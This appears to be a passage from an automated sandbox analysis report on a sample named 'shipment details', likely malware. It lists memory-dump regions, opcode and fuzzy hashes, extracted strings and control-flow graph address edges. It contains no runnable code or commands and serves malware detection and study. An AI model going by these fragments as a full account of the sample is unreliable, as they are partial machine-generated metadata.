                                                                                • Opcode ID: 96f56f549978a684d7c9a412ac4d42de5508cde65d666e1c9201035937ac4459
                                                                                • Instruction ID: 8f06ef2db4ffa298e1e7fa5c9d9746f825cbf50ab95ab3e6ef3a231d3288d6e6
                                                                                • Opcode Fuzzy Hash: 96f56f549978a684d7c9a412ac4d42de5508cde65d666e1c9201035937ac4459
                                                                                • Instruction Fuzzy Hash: F5E13DB1A00119CFDB15CFA9C884AADBBF6BF88318F558455E905EB3A1D734EC41CB94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o]q$4']q
                                                                                • API String ID: 0-176817397
                                                                                • Opcode ID: f8a9ae60d1a8270efbbe33bf54fb2814296915c036f05393e094b2e90927d815
                                                                                • Instruction ID: 84d8c17115233b86b9393f34c2ad7099dada70940934469ec7fa09ce6e0d5f42
                                                                                • Opcode Fuzzy Hash: f8a9ae60d1a8270efbbe33bf54fb2814296915c036f05393e094b2e90927d815
                                                                                • Instruction Fuzzy Hash: E1828C31A00209DFDB15CFA8C984AAEBBF6FF88318F158959E545DB3A2D731E841CB54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1836 13369a0-13369e6 1837 1336fb1-133700c call 1337118 1836->1837 1838 13369ec-13369fa 1836->1838 1854 133700e-1337012 1837->1854 1855 133705c-1337060 1837->1855 1842 1336a28-1336a39 1838->1842 1843 13369fc-1336a0d 1838->1843 1844 1336a3b-1336a3f 1842->1844 1845 1336aaa-1336abe 1842->1845 1843->1842 1856 1336a0f-1336a1b 1843->1856 1848 1336a41-1336a4d 1844->1848 1849 1336a5a-1336a63 1844->1849 1983 1336ac1 call 13369a0 1845->1983 1984 1336ac1 call 1336fc8 1845->1984 1850 1336a53-1336a55 1848->1850 1851 1336ddb-1336e26 1848->1851 1852 1336a69-1336a6c 1849->1852 1853 1336d6c 1849->1853 1858 1336d62-1336d69 1850->1858 1932 1336e2d-1336eac 1851->1932 1852->1853 1859 1336a72-1336a91 1852->1859 1864 1336d71-1336dd4 1853->1864 1862 1337021-1337028 1854->1862 1863 1337014-1337019 1854->1863 1860 1337062-1337071 1855->1860 1861 1337077-133708b 1855->1861 1856->1864 1865 1336a21-1336a23 1856->1865 1857 1336ac7-1336acd 1866 1336ad6-1336add 1857->1866 1867 1336acf-1336ad1 1857->1867 1859->1853 1897 1336a97-1336a9d 1859->1897 1868 1337073-1337075 1860->1868 1869 133709d-13370a7 1860->1869 1871 1337093-133709a 1861->1871 1980 133708d call 1339dd0 1861->1980 1981 133708d call 133a088 1861->1981 1982 133708d call 133a0e8 1861->1982 1872 13370fe-1337113 1862->1872 1873 133702e-1337035 1862->1873 1863->1862 1864->1851 1865->1858 1874 1336ae3-1336afa 1866->1874 1875 1336bcb-1336bdc 1866->1875 1867->1858 1868->1871 1879 13370b1-13370b5 1869->1879 1880 13370a9-13370af 1869->1880 1873->1855 1878 1337037-133703b 1873->1878 1874->1875 1889 1336b00-1336b0c 1874->1889 1892 1336c06-1336c0c 1875->1892 1893 1336bde-1336beb 1875->1893 1884 133704a-1337051 1878->1884 1885 133703d-1337042 1878->1885 1886 13370bd-13370f7 1879->1886 1888 13370b7 1879->1888 1880->1886 1884->1872 1894 1337057-133705a 1884->1894 1885->1884 1886->1872 1888->1886 1895 1336b12-1336b7e 1889->1895 1896 1336bc4-1336bc6 1889->1896 1899 1336c27-1336c2d 1892->1899 1900 1336c0e-1336c1a 1892->1900 1893->1899 1912 1336bed-1336bf9 1893->1912 1894->1871 1937 1336b80-1336baa 1895->1937 1938 1336bac-1336bc1 1895->1938 1896->1858 1897->1837 1905 1336aa3-1336aa7 1897->1905 1902 1336c33-1336c50 1899->1902 1903 1336d5f 1899->1903 1907 1336ec3-1336f26 1900->1907 1908 1336c20-1336c22 1900->1908 1902->1853 1926 1336c56-1336c59 1902->1926 1903->1858 1905->1845 1960 1336f2d-1336fac 1907->1960 1908->1858 1916 1336eb1-1336ebc 1912->1916 1917 1336bff-1336c01 1912->1917 1916->1907 1917->1858 1926->1837 1929 1336c5f-1336c85 1926->1929 1929->1903 1942 1336c8b-1336c97 1929->1942 1937->1938 1938->1896 1945 1336d5b-1336d5d 1942->1945 1946 1336c9d-1336d15 1942->1946 1945->1858 1961 1336d43-1336d58 1946->1961 1962 1336d17-1336d41 1946->1962 1961->1945 1962->1961 1980->1871 1981->1871 1982->1871 1983->1857 1984->1857
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o]q$Haq
                                                                                • API String ID: 0-903699183
                                                                                • Opcode ID: de2ff74711ba1c82abdbef46eafd2b325428e3d6052ea5ef05472dff7807ab69
                                                                                • Instruction ID: ee2294cb7655d5c095668c4d79f8beae8c30f8f6f8c698a77d2e5e80a29f1ba9
                                                                                • Opcode Fuzzy Hash: de2ff74711ba1c82abdbef46eafd2b325428e3d6052ea5ef05472dff7807ab69
                                                                                • Instruction Fuzzy Hash: 7412ADB0A002199FDB14DF69C844AAEBBF6FFC8304F108529E906DB395DB349D46CB94

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2154 133c147-133c158 2155 133c184 2154->2155 2156 133c15a-133c172 2154->2156 2157 133c186-133c18a 2155->2157 2160 133c174-133c179 2156->2160 2161 133c17b-133c17e 2156->2161 2160->2157 2162 133c180-133c182 2161->2162 2163 133c18b-133c199 2161->2163 2162->2155 2162->2156 2165 133c19b-133c1a1 2163->2165 2166 133c1dc-133c1e3 2163->2166 2167 133c1a3-133c1c8 2165->2167 2168 133c1e4-133c2ac call 13341a0 call 1333cc0 2165->2168 2166->2168 2169 133c1ca 2167->2169 2170 133c1cf-133c1db 2167->2170 2180 133c2b3-133c2d4 call 1335658 2168->2180 2181 133c2ae 2168->2181 2169->2170 2170->2166 2183 133c2d9-133c2e4 2180->2183 2181->2180 2184 133c2e6 2183->2184 2185 133c2eb-133c2ef 2183->2185 2184->2185 2186 133c2f1-133c2f2 2185->2186 2187 133c2f4-133c2fb 2185->2187 2188 133c313-133c357 2186->2188 2189 133c302-133c310 2187->2189 2190 133c2fd 2187->2190 2194 133c3bd-133c3d4 2188->2194 2189->2188 2190->2189 2196 133c3d6-133c3fb 2194->2196 2197 133c359-133c36f 2194->2197 2204 133c413 2196->2204 2205 133c3fd-133c412 2196->2205 2201 133c371-133c37d 2197->2201 2202 133c399 2197->2202 2206 133c387-133c38d 2201->2206 2207 133c37f-133c385 2201->2207 2203 133c39f-133c3bc 2202->2203 2203->2194 2205->2204 2208 133c397 2206->2208 2207->2208 2208->2203
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q$PH]q
                                                                                • API String ID: 0-1166926398
                                                                                • Opcode ID: 4ca78c4f7e1573d659146a2d5aaee2d1a17c69f4bd103d57c6e7bfe52e212ba8
                                                                                • Instruction ID: 211994594674d57175c51fdbeb3adf5314ae42e83a84792e1d995c74204e3d69
                                                                                • Opcode Fuzzy Hash: 4ca78c4f7e1573d659146a2d5aaee2d1a17c69f4bd103d57c6e7bfe52e212ba8
                                                                                • Instruction Fuzzy Hash: C2A1F474E00258CFDB14DFAAD884A9DBBF2BF89314F14906AE508EB365DB349942CF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2212 1335362-1335364 2213 1335366-13353a0 2212->2213 2214 13353c4-1335484 call 13341a0 call 1333cc0 2212->2214 2215 13353a2 2213->2215 2216 13353a7-13353c2 2213->2216 2226 1335486 2214->2226 2227 133548b-13354a9 2214->2227 2215->2216 2216->2214 2226->2227 2257 13354ac call 1335649 2227->2257 2258 13354ac call 1335658 2227->2258 2228 13354b2-13354bd 2229 13354c4-13354c8 2228->2229 2230 13354bf 2228->2230 2231 13354ca-13354cb 2229->2231 2232 13354cd-13354d4 2229->2232 2230->2229 2233 13354ec-1335530 2231->2233 2234 13354d6 2232->2234 2235 13354db-13354e9 2232->2235 2239 1335596-13355ad 2233->2239 2234->2235 2235->2233 2241 1335532-1335548 2239->2241 2242 13355af-13355d4 2239->2242 2246 1335572 2241->2246 2247 133554a-1335556 2241->2247 2248 13355d6-13355eb 2242->2248 2249 13355ec 2242->2249 2252 1335578-1335595 2246->2252 2250 1335560-1335566 2247->2250 2251 1335558-133555e 2247->2251 2248->2249 2253 1335570 2250->2253 2251->2253 2252->2239 2253->2252 2257->2228 2258->2228
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q$PH]q
                                                                                • API String ID: 0-1166926398
                                                                                • Opcode ID: af6cfaa913c884e820baf51279d788829c199ea18ec1eeb8ffd19ea111ea4bbf
                                                                                • Instruction ID: 94b6cbbe6661e2fa7514c0381ed36e8513ec001ed7f59e0bb899135fd8ecbd03
                                                                                • Opcode Fuzzy Hash: af6cfaa913c884e820baf51279d788829c199ea18ec1eeb8ffd19ea111ea4bbf
                                                                                • Instruction Fuzzy Hash: 4C91D574E00258CFDB18DFAAD984A9DBBF2BF89304F14C069E409AB365DB349945CF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2259 133c468-133c46d 2260 133c4b0-133c57c call 13341a0 call 1333cc0 2259->2260 2261 133c46f-133c498 2259->2261 2273 133c583-133c5a4 call 1335658 2260->2273 2274 133c57e 2260->2274 2262 133c49a 2261->2262 2263 133c49f-133c4ae 2261->2263 2262->2263 2263->2260 2276 133c5a9-133c5b4 2273->2276 2274->2273 2277 133c5b6 2276->2277 2278 133c5bb-133c5bf 2276->2278 2277->2278 2279 133c5c1-133c5c2 2278->2279 2280 133c5c4-133c5cb 2278->2280 2281 133c5e3-133c627 2279->2281 2282 133c5d2-133c5e0 2280->2282 2283 133c5cd 2280->2283 2287 133c68d-133c6a4 2281->2287 2282->2281 2283->2282 2289 133c6a6-133c6cb 2287->2289 2290 133c629-133c63f 2287->2290 2297 133c6e3 2289->2297 2298 133c6cd-133c6e2 2289->2298 2294 133c641-133c64d 2290->2294 2295 133c669 2290->2295 2299 133c657-133c65d 2294->2299 2300 133c64f-133c655 2294->2300 2296 133c66f-133c68c 2295->2296 2296->2287 2298->2297 2301 133c667 2299->2301 2300->2301 2301->2296
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q$PH]q
                                                                                • API String ID: 0-1166926398
                                                                                • Opcode ID: 723d808053b4a8dba8ec919e68e3a488c27b377ff45399f68c8ff441d242aa20
                                                                                • Instruction ID: 4ab59c1544a8807b556f29be5bc7dda44d4d3f3e6760dfd8cc1da3c531db67ab
                                                                                • Opcode Fuzzy Hash: 723d808053b4a8dba8ec919e68e3a488c27b377ff45399f68c8ff441d242aa20
                                                                                • Instruction Fuzzy Hash: F681C574E00218CFEB14DFAAD984A9DBBF2BF88314F14D06AE419AB365DB349941CF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2305 133ca08-133ca38 2307 133ca3a 2305->2307 2308 133ca3f-133cb1c call 13341a0 call 1333cc0 2305->2308 2307->2308 2318 133cb23-133cb44 call 1335658 2308->2318 2319 133cb1e 2308->2319 2321 133cb49-133cb54 2318->2321 2319->2318 2322 133cb56 2321->2322 2323 133cb5b-133cb5f 2321->2323 2322->2323 2324 133cb61-133cb62 2323->2324 2325 133cb64-133cb6b 2323->2325 2326 133cb83-133cbc7 2324->2326 2327 133cb72-133cb80 2325->2327 2328 133cb6d 2325->2328 2332 133cc2d-133cc44 2326->2332 2327->2326 2328->2327 2334 133cc46-133cc6b 2332->2334 2335 133cbc9-133cbdf 2332->2335 2342 133cc83 2334->2342 2343 133cc6d-133cc82 2334->2343 2339 133cbe1-133cbed 2335->2339 2340 133cc09 2335->2340 2344 133cbf7-133cbfd 2339->2344 2345 133cbef-133cbf5 2339->2345 2341 133cc0f-133cc2c 2340->2341 2341->2332 2343->2342 2346 133cc07 2344->2346 2345->2346 2346->2341
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q$PH]q
                                                                                • API String ID: 0-1166926398
                                                                                • Opcode ID: d35d9287f13d9a35504cca0d1b315b8772c4aa2b5270fd7f1c1ffd8cfae1e94f
                                                                                • Instruction ID: e7438fd01221ba8f07c4288c6842eca30edba0b79bc3ed1e3ebeb2304ca1e4e2
                                                                                • Opcode Fuzzy Hash: d35d9287f13d9a35504cca0d1b315b8772c4aa2b5270fd7f1c1ffd8cfae1e94f
                                                                                • Instruction Fuzzy Hash: C581B474E00218CFDB18DFAAD984A9DBBF2BF88304F14D06AE419AB365DB349945CF54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q$PH]q
                                                                                • API String ID: 0-1166926398
                                                                                • Opcode ID: f0d035ddccc6b98d04c499e0026b8fa6ed7779de10b635b259efa00ad00697e8
                                                                                • Instruction ID: d324f5e991381952cbabe8a99bc6d27e95c56c91fe58c701a291bf36d75a15b5
                                                                                • Opcode Fuzzy Hash: f0d035ddccc6b98d04c499e0026b8fa6ed7779de10b635b259efa00ad00697e8
                                                                                • Instruction Fuzzy Hash: 5581D374E00218CFDB18DFAAD984A9DBBF2BF88304F54C069E419AB365DB349945CF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2350 133c738-133c768 2351 133c76a 2350->2351 2352 133c76f-133c84c call 13341a0 call 1333cc0 2350->2352 2351->2352 2362 133c853-133c874 call 1335658 2352->2362 2363 133c84e 2352->2363 2365 133c879-133c884 2362->2365 2363->2362 2366 133c886 2365->2366 2367 133c88b-133c88f 2365->2367 2366->2367 2368 133c891-133c892 2367->2368 2369 133c894-133c89b 2367->2369 2370 133c8b3-133c8f7 2368->2370 2371 133c8a2-133c8b0 2369->2371 2372 133c89d 2369->2372 2376 133c95d-133c974 2370->2376 2371->2370 2372->2371 2378 133c976-133c99b 2376->2378 2379 133c8f9-133c90f 2376->2379 2385 133c9b3 2378->2385 2386 133c99d-133c9b2 2378->2386 2383 133c911-133c91d 2379->2383 2384 133c939 2379->2384 2387 133c927-133c92d 2383->2387 2388 133c91f-133c925 2383->2388 2389 133c93f-133c95c 2384->2389 2386->2385 2390 133c937 2387->2390 2388->2390 2389->2376 2390->2389
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q$PH]q
                                                                                • API String ID: 0-1166926398
                                                                                • Opcode ID: 97f9f569635f33fbc63ac3737c49656c9b653f12b71c522de9ace923833d0287
                                                                                • Instruction ID: eaf72e13413095e3ebf341a9ef8678b83036c9167d54d42df5533e5b1b0ef9e4
                                                                                • Opcode Fuzzy Hash: 97f9f569635f33fbc63ac3737c49656c9b653f12b71c522de9ace923833d0287
                                                                                • Instruction Fuzzy Hash: EA81B374E00218CFDB18DFAAD984A9DBBF2BF88314F14D06AE418AB365DB309945CF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2394 133ccd8-133cd08 2395 133cd0a 2394->2395 2396 133cd0f-133cdec call 13341a0 call 1333cc0 2394->2396 2395->2396 2406 133cdf3-133ce14 call 1335658 2396->2406 2407 133cdee 2396->2407 2409 133ce19-133ce24 2406->2409 2407->2406 2410 133ce26 2409->2410 2411 133ce2b-133ce2f 2409->2411 2410->2411 2412 133ce31-133ce32 2411->2412 2413 133ce34-133ce3b 2411->2413 2414 133ce53-133ce97 2412->2414 2415 133ce42-133ce50 2413->2415 2416 133ce3d 2413->2416 2420 133cefd-133cf14 2414->2420 2415->2414 2416->2415 2422 133cf16-133cf3b 2420->2422 2423 133ce99-133ceaf 2420->2423 2430 133cf53 2422->2430 2431 133cf3d-133cf52 2422->2431 2427 133ceb1-133cebd 2423->2427 2428 133ced9 2423->2428 2432 133cec7-133cecd 2427->2432 2433 133cebf-133cec5 2427->2433 2429 133cedf-133cefc 2428->2429 2429->2420 2431->2430 2434 133ced7 2432->2434 2433->2434 2434->2429
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q$PH]q
                                                                                • API String ID: 0-1166926398
                                                                                • Opcode ID: 706bf77accb42c4d973d886ebdad6dd9cc1c08ff18474cba7bdb395e1fd64ecd
                                                                                • Instruction ID: dba97544c6d69e85d6b4e12037844f78e98f2b87acf0f7f63792e538021bc1c2
                                                                                • Opcode Fuzzy Hash: 706bf77accb42c4d973d886ebdad6dd9cc1c08ff18474cba7bdb395e1fd64ecd
                                                                                • Instruction Fuzzy Hash: 9D81C374E00218CFDB18DFAAD984A9DBBF2BF88304F14D06AE409AB365DB349945CF54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q$PH]q
                                                                                • API String ID: 0-1166926398
                                                                                • Opcode ID: c5144cc4ae955357a3b2ead05c87d6bf66c15975e03e748382d4810dc28448ec
                                                                                • Instruction ID: 8cae3761a17b79e9046c38e2d5dead516e6d57defb75005e6aa777a493cab75b
                                                                                • Opcode Fuzzy Hash: c5144cc4ae955357a3b2ead05c87d6bf66c15975e03e748382d4810dc28448ec
                                                                                • Instruction Fuzzy Hash: 7281C274E00218CFDB58DFAAD984A9DBBF2BF88304F14C069E419AB365DB349945CF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 294abce766c304d43c035d548c6d27268b4940a991ad3606efa63f4e33cdd10a
                                                                                • Instruction ID: dab893626315c3bef5ad44052d0c133fc039cc352037e306620d047688be5da8
                                                                                • Opcode Fuzzy Hash: 294abce766c304d43c035d548c6d27268b4940a991ad3606efa63f4e33cdd10a
                                                                                • Instruction Fuzzy Hash: D3F1F6B4D01218CFDB54DFA9D884B9DBBB2BF88304F54C1A9E408AB355EB719985CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 32b94400a975501df7ad775cdd38e352d5e59554949b31e31cd37be9bffa192e
                                                                                • Instruction ID: ac8f663c61f23c6ff54df446cc91fc7ec8df3b237470b48ec6e50230d7feb127
                                                                                • Opcode Fuzzy Hash: 32b94400a975501df7ad775cdd38e352d5e59554949b31e31cd37be9bffa192e
                                                                                • Instruction Fuzzy Hash: 3572CEB4E012298FDB65DF69C980BDDBBB2BB49304F1491E9D409AB355EB309E81CF40
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8b2b31a5ba41fb2d5cdd44b01b15c5e00dcd5e15425e3c8940db0c11f46326d7
                                                                                • Instruction ID: a20279904e48eca4f52c4f971410ecedd342e580daf0bcfb3767727d00681fee
                                                                                • Opcode Fuzzy Hash: 8b2b31a5ba41fb2d5cdd44b01b15c5e00dcd5e15425e3c8940db0c11f46326d7
                                                                                • Instruction Fuzzy Hash: EDC19F78E01218CFDB54DFA5D944B9DBBB2BF88304F1081A9E809AB365DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7c7b5770f5b5e98267fcacd435d830f7f64584359851e3d6374b3442b7843db1
                                                                                • Instruction ID: b1da9dbf19ad12e7a7c84d138ba1acaf2730c1c65db1029f4ab4ef0f3dafa52d
                                                                                • Opcode Fuzzy Hash: 7c7b5770f5b5e98267fcacd435d830f7f64584359851e3d6374b3442b7843db1
                                                                                • Instruction Fuzzy Hash: B8A10570D00208CFEB14DFA9C944BDDBBB1FF89304F209669E508AB2A2DB749985CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: acebefd2d3a0232f8809d68d9a1b3f66cd097ae038d620992f5c1960da2125fe
                                                                                • Instruction ID: eb33818a2425a2ede47f51e0c9a10b492a427098ec2e0ab3fcca7a6dc34f804d
                                                                                • Opcode Fuzzy Hash: acebefd2d3a0232f8809d68d9a1b3f66cd097ae038d620992f5c1960da2125fe
                                                                                • Instruction Fuzzy Hash: 02A10674D002088FEB14DFA9C944BDDBBB1FF88304F209669E509AB2A2DB749985CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 017be464e863805ea8a7b758537d5106bb4378c7ef4cac3d1ccbbc6327e01fbb
                                                                                • Instruction ID: 895b6e6c993683ae2f308aa4f09f97bbea55c0aec169d4857b374972a9ea181f
                                                                                • Opcode Fuzzy Hash: 017be464e863805ea8a7b758537d5106bb4378c7ef4cac3d1ccbbc6327e01fbb
                                                                                • Instruction Fuzzy Hash: 85910674D00219CFEB50DFA8C844BDCBBB1FF49300F2096A9E509AB292EB749985CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 87c81aef4f866f7531299b1076a2d8e0455e6c38eca4c6adca09aaa245ddb57d
                                                                                • Instruction ID: 1e98afef2c5d9dc8dd841d5465b21f4aa2d3e0cbd839b83af2d98a9a34016d42
                                                                                • Opcode Fuzzy Hash: 87c81aef4f866f7531299b1076a2d8e0455e6c38eca4c6adca09aaa245ddb57d
                                                                                • Instruction Fuzzy Hash: 92515870D01208CBDB04EFA9D5847EDBBB6BB88318FA4C128D404BB295CB759981CB59
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c0b33d042e15d578fe7af167432527642d74e9b5dafcda88e317b37aae2da770
                                                                                • Instruction ID: 7d63d9ec0515f635d7418a5ca4252d84c1c3007f521ec70e20a15addc6ac6d27
                                                                                • Opcode Fuzzy Hash: c0b33d042e15d578fe7af167432527642d74e9b5dafcda88e317b37aae2da770
                                                                                • Instruction Fuzzy Hash: BD51B574E00218DFDB18DFAAD984A9DBBB6FF88314F24C129E815AB365DB345846CF14
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6746722da847e949789cc8f56d365a33647dd44075250f7c8ff9fb9b18551af9
                                                                                • Instruction ID: ffe364d0fe97b23e63123e134b4fa7ae5747e340fb045552acda07ebb50a2985
                                                                                • Opcode Fuzzy Hash: 6746722da847e949789cc8f56d365a33647dd44075250f7c8ff9fb9b18551af9
                                                                                • Instruction Fuzzy Hash: 7551B474E00208DFEB18DFAAD594A9DBBB6BF88304F208529E819AB365DB345845CF14
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e341893b8bb322b6e9cacdb09476af2a8a4a3868c1c1d6c783555734d60c94a3
                                                                                • Instruction ID: 0165d3eb627ad284d7c7a20a6b3eeadee3f56b077ab537c78acdce9b8b950b33
                                                                                • Opcode Fuzzy Hash: e341893b8bb322b6e9cacdb09476af2a8a4a3868c1c1d6c783555734d60c94a3
                                                                                • Instruction Fuzzy Hash: 04512570D05208CFDB04EFA8D5847EDBBBABB89318FA49129D009BB295C7359981CF59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
